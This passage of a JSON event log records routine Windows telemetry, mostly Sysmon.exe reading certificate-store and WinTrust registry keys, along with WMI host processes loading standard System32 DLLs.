"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482290000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "perfproc.dll", - "image_path": "C:\\Windows\\System32\\perfproc.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479950016, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "fastprox.dll", - "image_path": "C:\\Windows\\System32\\wbem\\fastprox.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": 
"C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\WINDOWS\\system32\\wbem\\WmiApSrv.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Wbem\\PROVIDERS\\Performance", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Wbem\\PROVIDERS\\Performance\\Performance Refreshed", - "registry_value": "Performance Refreshed", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - 
}, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "sysmain.dll", - "image_path": "C:\\Windows\\System32\\sysmain.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573480259984, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - 
"registry_value": "Certificates", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": 
"registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482450016, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "wmiprov.dll", - "image_path": "C:\\Windows\\System32\\wbem\\wmiprov.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "image_load", - "image_name": "rasctrs.dll", - "image_path": "C:\\Windows\\System32\\rasctrs.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573480259984, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - 
"pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", 
- "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - 
"registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": 